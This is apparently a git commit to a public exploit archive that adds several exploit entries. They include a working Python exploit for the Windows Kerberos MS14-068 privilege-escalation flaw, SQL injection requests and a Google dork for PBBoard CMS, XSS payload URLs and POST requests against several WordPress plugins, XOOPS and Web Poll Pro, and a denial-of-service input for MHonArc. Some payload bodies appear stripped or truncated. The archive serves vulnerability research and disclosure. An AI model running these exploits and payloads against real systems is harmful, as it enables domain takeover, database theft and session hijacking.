From 3672d19ffa56928d57ff2f05bb82535cb4feac00 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 7 Dec 2014 04:53:52 +0000 Subject: [PATCH] Updated 12_07_2014 --- files.csv | 8 ++ platforms/lin_amd64/local/35472.txt | 77 ++++++++++++ platforms/linux/dos/35478.txt | 9 ++ platforms/php/webapps/35473.txt | 158 +++++++++++++++++++++++ platforms/php/webapps/35475.txt | 12 ++ platforms/php/webapps/35476.txt | 11 ++ platforms/php/webapps/35477.txt | 78 ++++++++++++ platforms/php/webapps/35479.txt | 15 +++ platforms/windows/remote/35474.py | 189 ++++++++++++++++++++++++++++ 9 files changed, 557 insertions(+) create mode 100755 platforms/lin_amd64/local/35472.txt create mode 100755 platforms/linux/dos/35478.txt create mode 100755 platforms/php/webapps/35473.txt create mode 100755 platforms/php/webapps/35475.txt create mode 100755 platforms/php/webapps/35476.txt create mode 100755 platforms/php/webapps/35477.txt create mode 100755 platforms/php/webapps/35479.txt create mode 100755 platforms/windows/remote/35474.py diff --git a/files.csv b/files.csv index 04c597eae..1014d9ffd 100755 --- a/files.csv +++ b/files.csv @@ -31946,3 +31946,11 @@ id,file,description,date,author,platform,type,port 35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0 35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0 +35472,platforms/lin_amd64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64bit Linux",2014-12-05,"Packet Storm",lin_amd64,local,0 +35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 +35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 +35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 +35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 Multiple Cross Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 +35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 +35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0 +35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0 diff --git a/platforms/lin_amd64/local/35472.txt b/platforms/lin_amd64/local/35472.txt new file mode 100755 index 000000000..25355bbe7 --- /dev/null +++ b/platforms/lin_amd64/local/35472.txt @@ -0,0 +1,77 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + ++------------------------------------------------------------------------------+ +| Packet Storm Advisory 2014-1204-1 | +| http://packetstormsecurity.com/ | ++------------------------------------------------------------------------------+ +| Title: Offset2lib: Bypassing Full ASLR On 64bit Linux | ++--------------------+---------------------------------------------------------+ +| Release Date | 2014/12/04 | +| Advisory Contact | Packet Storm (advisories@packetstormsecurity.com) | +| Researchers | Hector Marco and Ismael Ripoll | ++--------------------+---------------------------------------------------------+ +| System Affected | 64 bit PIE Linux | +| Classification | 1-day | ++--------------------+---------------------------------------------------------+ + ++----------+ +| OVERVIEW | ++----------+ + +The release of this advisory provides exploitation details in relation +a weakness in the Linux ASLR implementation. The problem appears when +the executable is PIE compiled and it has an address leak belonging to +the executable. + +These details were obtained through the Packet Storm Bug Bounty program +and are being released to the community. + ++------------------------------------------------------------------------------+ + ++---------+ +| DETAILS | ++---------+ + +An attacker is able to de-randomize all mmapped areas (libraries, mapped files, etc.) +by knowing only an address belonging to the application and the offset2lib value. + ++------------------------------------------------------------------------------+ + ++------------------+ +| PROOF OF CONCEPT | ++------------------+ + +The proof of concept exploit code is available here: +http://www.exploit-db.com/sploits/35472.tgz +http://packetstormsecurity.com/files/129398 + ++------------------------------------------------------------------------------+ + ++---------------+ +| RELATED LINKS | ++---------------+ + +http://cybersecurity.upv.es/attacks/offset2lib/offset2lib.html + ++------------------------------------------------------------------------------+ + + ++----------------+ +| SHAMELESS PLUG | ++----------------+ + +The Packet Storm Bug Bounty program gives researchers the ability to profit +from their discoveries. You can get paid thousands of dollars for one day +and zero day exploits. Get involved by contacting us at +getpaid@packetstormsecurity.com or visit the bug bounty page at: + +http://packetstormsecurity.com/bugbounty/ + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.4.11 (GNU/Linux) + +iEYEARECAAYFAlSBA04ACgkQrM7A8W0gTbG0jwCdH5CHOIDO9ELRcrPhQmf5FF4z +TgQAn2zuwadnWdMueC8gUQPT5gCmrQyp +=iegV +-----END PGP SIGNATURE----- diff --git a/platforms/linux/dos/35478.txt b/platforms/linux/dos/35478.txt new file mode 100755 index 000000000..c24369988 --- /dev/null +++ b/platforms/linux/dos/35478.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46923/info + +MHonArc is prone to a remote denial-of-service vulnerability. + +An attacker can exploit this issue to consume all CPU resources, denying service to legitimate users. + +MHonArc versions 2.6.16 and prior are vulnerable. + +dy>dy>dy>dy> \ No newline at end of file diff --git a/platforms/php/webapps/35473.txt b/platforms/php/webapps/35473.txt new file mode 100755 index 000000000..04bdab5bc --- /dev/null +++ b/platforms/php/webapps/35473.txt @@ -0,0 +1,158 @@ +Vulnerability title: SQL Injection in PBBoard CMS +CVE: CVE-2014-9215 +CMS: PBBoard +Vendor: Power bulletin board - http://www.pbboard.info/ +Product: http://sourceforge.net/projects/pbboard/files/PBBoard_v3.0.1/PBBoard_v3.0.1.zip/download +Affected version: Version 3.0.1 (updated on 13/09/2014) and before. +Fixed version: Version 3.0.1 (updated on 28/11/2014) +Google dork: intext:Powered By PBBoard +Reported by: Tran Dinh Tien - tien.d.tran@itas.vn +Credits to ITAS Team - www.itas.vn + + +:: DESCRITION :: + +Multiple SQL injection vulnerabilities has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from SQL injection. + +:: DETAILS :: Attack vector + +Link 1: + +POST /index.php?page=register&checkemail=1 HTTP/1.1 +Host: server +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://server/index.php?page=register&index=1&agree=1 +Content-Length: 29 +Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +email=&ajax=1 + + +Link 2: + +POST /index.php?page=forget&start=1 HTTP/1.1 +Host: target.org +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://server/index.php?page=forget&index=1 +Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 52 + +code=0ae4e&email=&submit_forget=Save + + +link 3: + +POST /index.php?page=forget&send_active_code=1 HTTP/1.1 +Host: target.org +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://server/index.php?page=forget&active_member=1&send_active_code=1 +Cookie: PowerBB_lastvisit=1417086736; PHPSESSID=j0f7fuju2tu2ip7jrlgq6m56k4 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 57 + +code=13709&email=&submit_active_code=Save + + +:: CODE DETAIL :: + +- Vulnerable parameter: email +- Vulnerable file: includes/functions.class.php +- Vulnerable function: CheckEmail($email) + +- Vulnerable code: + function CheckEmail($email) + { + return preg_match('#^[a-z0-9.!\#$%&\'*+-/=?^_`{|}~]+@([0-9.]+|([^\s\'"<>@,;]+\.+[a-z]{2,6}))$#si', $email) ? true : false; + } + +- Fix code: + function CheckEmail($email) + { + // First, we check that there's one @ symbol, and that the lengths are right + if (!preg_match("/^[^@]{1,64}@[^@]{1,255}$/", $email)) { + // Email invalid because wrong number of characters in one section, or wrong number of @ symbols. + return false; + } + + if (@strstr($email,'"') + or @strstr($email,"'") + or @strstr($email,'>') + or @strstr($email,'<') + or @strstr($email,'*') + or @strstr($email,'%') + or @strstr($email,'$') + or @strstr($email,'#') + or @strstr($email,'+') + or @strstr($email,'^') + or @strstr($email,'&') + or @strstr($email,',') + or @strstr($email,'~') + or @strstr($email,'!') + or @strstr($email,'{') + or @strstr($email,'}') + or @strstr($email,'(') + or @strstr($email,')') + or @strstr($email,'/')) + { + return false; + } + // Split it into sections to make life easier + $email_array = explode("@", $email); + $local_array = explode(".", $email_array[0]); + for ($i = 0; $i < sizeof($local_array); $i++) { + if (!preg_match("/^(([A-Za-z0-9!#$%&'*+\/=?^_`{|}~-][A-Za-z0-9!#$%&'*+\/=?^_`{|}~\.-]{0,63})|(\"[^(\\|\")]{0,62}\"))$/", $local_array[$i])) { + return false; + } + } + if (!preg_match("/^\[?[0-9\.]+\]?$/", $email_array[1])) { // Check if domain is IP. If not, it should be valid domain name + $domain_array = explode(".", $email_array[1]); + if (sizeof($domain_array) < 2) { + return false; // Not enough parts to domain + } + for ($i = 0; $i < sizeof($domain_array); $i++) { + if (!preg_match("/^(([A-Za-z0-9][A-Za-z0-9-]{0,61}[A-Za-z0-9])|([A-Za-z0-9]+))$/", $domain_array[$i])) { + return false; + } + } + } + + return true; + } + + + +:: SOLUTION :: +Version 3.0.1 (updated on 28/11/2014) + +:: DISCLOSURE :: +- 11/27/2014: Inform the vendor +- 11/28/2014: Vendor confirmed +- 11/28/2014: Vendor releases patch +- 12/01/2014: ITAS Team publishes information + +::COPYRIGHT:: +Copyright (c) ITAS CORP 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of ITAS CORP (www.itas.vn). + +:: DISCLAIMER :: +THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK. + +:: REFERENCE :: +- http://www.itas.vn/news/ITAS-Team-discovered-SQL-Injection-in-PBBoard-CMS-68.html +- https://www.youtube.com/watch?v=AQiGvH5xrJg \ No newline at end of file diff --git a/platforms/php/webapps/35475.txt b/platforms/php/webapps/35475.txt new file mode 100755 index 000000000..462ec9274 --- /dev/null +++ b/platforms/php/webapps/35475.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/46902/info + +Sodahead Polls is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Sodahead Polls 2.0.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/sodahead-polls/poll.php?customize=%27;%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E + + +http://www.example.com/wp-content/plugins/sodahead-polls/customizer.php?poll_id=%27%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35476.txt b/platforms/php/webapps/35476.txt new file mode 100755 index 000000000..b3166d4e7 --- /dev/null +++ b/platforms/php/webapps/35476.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/46904/info + +Rating-Widget is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Rating-Widget 1.3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/rating-widget/view/rating.php?vars[type]=[xss] +http://www.example.com/plugins/rating-widget/view/availability_options.php?selected_key=[xss] +http://www.example.com/wp-content/plugins/rating-widget/view/save.php?rw_form_hidden_field_name=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/35477.txt b/platforms/php/webapps/35477.txt new file mode 100755 index 000000000..f563ec6b1 --- /dev/null +++ b/platforms/php/webapps/35477.txt @@ -0,0 +1,78 @@ +source: http://www.securityfocus.com/bid/46916/info + +XOOPS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +XOOPS 2.5.0 is vulnerable; other versions may also be affected. + +Parameter: module + +http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe + + +Parameter: module[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +op=confirm&module%5b%5d=1">&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System +[/REQUEST] + + +Parameter: memberslist_id[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=users&selgroups=2 +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 94 + +memberslist_id%5b%5d=">&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group +[/REQUEST] + + +Parameter: newname[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System"> +[/REQUEST] + + +Parameter: oldname[] + +[REQUEST] +POST /xoops/modules/system/admin.php HTTP/1.1 +Host: attacker.in +Connection: close +Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin +Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; +xoops_user=1-549115432fcb56150b18bef08004f77d; +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System">1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System +[/REQUEST] + + + diff --git a/platforms/php/webapps/35479.txt b/platforms/php/webapps/35479.txt new file mode 100755 index 000000000..07faa59c6 --- /dev/null +++ b/platforms/php/webapps/35479.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/46932/info + +Web Poll Pro is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, or launch other attacks. + +Web Poll Pro 1.0.3 is vulnerable; other versions may also be affected. + +
+ +'> +
+ \ No newline at end of file diff --git a/platforms/windows/remote/35474.py b/platforms/windows/remote/35474.py new file mode 100755 index 000000000..a23e6b040 --- /dev/null +++ b/platforms/windows/remote/35474.py @@ -0,0 +1,189 @@ +#!/usr/bin/python + +# MS14-068 Exploit + +# Author +# ------ +# Sylvain Monne +# Contact : sylvain dot monne at solucom dot fr +# http://twitter.com/bidord + + + +import sys, os +from random import getrandbits +from time import time, localtime, strftime + +from kek.ccache import CCache, get_tgt_cred, kdc_rep2ccache +from kek.crypto import generate_subkey, ntlm_hash, RC4_HMAC, HMAC_MD5 +from kek.krb5 import build_as_req, build_tgs_req, send_req, recv_rep, \ + decrypt_as_rep, decrypt_tgs_rep, decrypt_ticket_enc_part, iter_authorization_data, \ + AD_WIN2K_PAC +from kek.pac import build_pac, pretty_print_pac +from kek.util import epoch2gt, gt2epoch + + +def sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, + output_filename, krbtgt_a_key=None, trust_ab_key=None, target_key=None): + + sys.stderr.write(' [+] Building AS-REQ for %s...' % kdc_a) + sys.stderr.flush() + nonce = getrandbits(31) + current_time = time() + as_req = build_as_req(user_realm, user_name, user_key, current_time, nonce, pac_request=False) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Sending AS-REQ to %s...' % kdc_a) + sys.stderr.flush() + sock = send_req(as_req, kdc_a) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Receiving AS-REP from %s...' % kdc_a) + sys.stderr.flush() + data = recv_rep(sock) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Parsing AS-REP from %s...' % kdc_a) + sys.stderr.flush() + as_rep, as_rep_enc = decrypt_as_rep(data, user_key) + session_key = (int(as_rep_enc['key']['keytype']), str(as_rep_enc['key']['keyvalue'])) + logon_time = gt2epoch(str(as_rep_enc['authtime'])) + tgt_a = as_rep['ticket'] + sys.stderr.write(' Done!\n') + + + if krbtgt_a_key is not None: + print >> sys.sdterr, as_rep.prettyPrint() + print >> sys.stderr, as_rep_enc.prettyPrint() + ticket_debug(tgt_a, krbtgt_a_key) + + sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_a) + sys.stderr.flush() + subkey = generate_subkey() + nonce = getrandbits(31) + current_time = time() + pac = (AD_WIN2K_PAC, build_pac(user_realm, user_name, user_sid, logon_time)) + tgs_req = build_tgs_req(user_realm, 'krbtgt', target_realm, user_realm, user_name, + tgt_a, session_key, subkey, nonce, current_time, pac, pac_request=False) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_a) + sys.stderr.flush() + sock = send_req(tgs_req, kdc_a) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_a) + sys.stderr.flush() + data = recv_rep(sock) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_a) + tgs_rep, tgs_rep_enc = decrypt_tgs_rep(data, subkey) + session_key2 = (int(tgs_rep_enc['key']['keytype']), str(tgs_rep_enc['key']['keyvalue'])) + tgt_b = tgs_rep['ticket'] + sys.stderr.write(' Done!\n') + + + if trust_ab_key is not None: + pretty_print_pac(pac[1]) + print >> sys.stderr, tgs_rep.prettyPrint() + print >> sys.stderr, tgs_rep_enc.prettyPrint() + ticket_debug(tgt_b, trust_ab_key) + + + if target_service is not None and target_host is not None and kdc_b is not None: + sys.stderr.write(' [+] Building TGS-REQ for %s...' % kdc_b) + sys.stderr.flush() + subkey = generate_subkey() + nonce = getrandbits(31) + current_time = time() + tgs_req2 = build_tgs_req(target_realm, target_service, target_host, user_realm, user_name, + tgt_b, session_key2, subkey, nonce, current_time) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Sending TGS-REQ to %s...' % kdc_b) + sys.stderr.flush() + sock = send_req(tgs_req2, kdc_b) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Receiving TGS-REP from %s...' % kdc_b) + sys.stderr.flush() + data = recv_rep(sock) + sys.stderr.write(' Done!\n') + + sys.stderr.write(' [+] Parsing TGS-REP from %s...' % kdc_b) + tgs_rep2, tgs_rep_enc2 = decrypt_tgs_rep(data, subkey) + sys.stderr.write(' Done!\n') + + else: + tgs_rep2 = tgs_rep + tgs_rep_enc2 = tgs_rep_enc + + sys.stderr.write(' [+] Creating ccache file %r...' % output_filename) + cc = CCache((user_realm, user_name)) + tgs_cred = kdc_rep2ccache(tgs_rep2, tgs_rep_enc2) + cc.add_credential(tgs_cred) + cc.save(output_filename) + sys.stderr.write(' Done!\n') + + + if target_key is not None: + print >> sys.stderr, tgs_rep2.prettyPrint() + print >> sys.stderr, tgs_rep_enc2.prettyPrint() + ticket_debug(tgs_rep2['ticket'], target_key) + + +# Pretty print full ticket content +# Only possible in a lab environment when you already know krbtgt and/or service keys +def ticket_debug(ticket, key): + try: + ticket_enc = decrypt_ticket_enc_part(ticket, key) + print >> sys.stderr, ticket.prettyPrint() + for ad in iter_authorization_data(ticket_enc['authorization-data']): + print >> sys.stderr, 'AUTHORIZATION-DATA (type: %d):' % ad['ad-type'] + if ad['ad-type'] == AD_WIN2K_PAC: + pretty_print_pac(str(ad['ad-data'])) + else: + print >> sys.stderr, str(ad['ad-data']).encode('hex') + except Exception as e: + print 'ERROR:', e + + +if __name__ == '__main__': + from getopt import getopt + from getpass import getpass + + def usage_and_exit(): + print >> sys.stderr, 'USAGE:' + print >> sys.stderr, '%s -u @ -s -d ' % sys.argv[0] + print >> sys.stderr, '' + print >> sys.stderr, 'OPTIONS:' + print >> sys.stderr, ' -p ' + print >> sys.stderr, ' --rc4 ' + sys.exit(1) + + opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) + opts = dict(opts) + if not all(k in opts for k in ('-u', '-s', '-d')): + usage_and_exit() + + user_name, user_realm = opts['-u'].split('@', 1) + user_sid = opts['-s'] + kdc_a = opts['-d'] + + if '--rc4' in opts: + user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) + assert len(user_key[1]) == 16 + elif '-p' in opts: + user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) + else: + user_key = (RC4_HMAC, ntlm_hash(getpass('Password: ')).digest()) + + target_realm = user_realm + target_service = target_host = kdc_b = None + filename = 'TGT_%s@%s.ccache' % (user_name, user_realm) + + user_realm = user_realm.upper() + target_realm = target_realm.upper() + + sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename) \ No newline at end of file